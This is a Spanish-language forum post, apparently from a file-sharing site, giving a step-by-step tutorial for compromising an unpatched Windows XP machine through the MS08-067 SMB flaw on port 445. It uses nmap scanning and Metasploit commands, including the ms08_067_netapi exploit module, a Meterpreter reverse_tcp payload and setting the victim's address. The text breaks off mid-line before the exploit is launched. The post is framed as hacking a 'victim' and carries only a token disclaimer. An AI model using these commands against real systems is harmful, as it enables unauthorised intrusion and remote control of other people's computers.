Oops.. Este post tiene los enlaces eliminados!

Identi revisa las denuncias de los usuarios en busca de enlaces eliminados que no dejan descargar los archivos, este mensaje te informa que este post que estas viendo tiene los enlaces eliminados.

Usa el Buscador

Por favor, te recomendamos que uses el buscador para encontrar más alternativas.

Hackear Windows XP por puerto 445 (ms08-067)

• Categoría: Reciclaje
  • Publicado hace más de 3 años
Hackear Windows XP por puerto 445 (ms08-067)

Que tal amigos, el siguiente Post lo hago con motivo solo de información no me responsabilizo por el uso que se le de a lo siguiente 

Como les comente en mi anterior Post en el cual les deje el Back Track 5 el cual lo usaremos para hackear nuestro equipo con Windows XP esto lo haremos atacando la vulnerabilidad MS08-067 por el puerto 445 La cual se hizo un poco famosa hace un par de años cuando Conficker infecto miles de equipos, a continuacion les explicare paso a paso como hacer esto... comenzamos!

Este laboratorio se realizo con BackTrack 5 y un equipo Windows XP SP3, aclaro tambien que el equipo con windows es un equipo sin ninguna actualización de windows y el Firewall esta desactivado

Lo primero que necesitamos saber es nuestra Ip por lo que abriremos una nueva terminal y escribiremos ifconfig

En mi caso mi IP es 192.168.254.39, una vez que sabemos esto tenemos que buscar en la red los equipos.

Para realizar un escaneo de los equipos que estan en nuestra red usaremos el comando 

nmap -sP 192.168.254.1-255 

En mi caso la red es 192.168.254 esto puede variar dependiendo de el segmento en el que se encuentren

Una vez que encontramos el equipo comenzaremos una busqueda para saber los puertos abiertos que tiene el SO.

Esto lo realizaremos con el comando 

nmap -sS -sV 192.168.254.44 (en mi caso la maquina que atacare tiene la IP 44)

Como podemos ver el puerto 445/tcp nos lo muestra como abierto (este sera el que atacaremos) una vez que tenemos esta información comenzaremos a utilizar el metasploit.

El  siguiente comando que utilizaremos sera 
msfconsole

Puede tardar un momento en mostrarnos la ventana de metasploit, así como la imagen puede variar a la que se muestra aquí.

Una vez que estamos en la consola de metasploit utilizaremos el comando

search windows/smb/ms

nos mostrara algo como lo siguiente

En la segunda imagen resalte el exploit que utilizaremos.

El siguiente comando que utilizaremos sera

use windows/smb/ms08_067_netapi

nos saldra algo parecido a esto

El siguiente comando sera

set payload windows/meterpreter/reverse_tcp

Nos mostrara algo así

El siguiente comando sera set rhost y la IP de la victima quedara algo así

set rhost 192.168.254.44

[c
Hackear Windows XP por puerto 445 (ms08-067)
0 Puntos Score: 0/10
Visitas: 166 Favoritos: 0
0 Comentarios Hackear Windows XP por puerto 445 (ms08-067)
Este post no tiene comentarios. Sea el primero!
Para dejar un comentario Registrate! o.. eres ya usuario? Accede!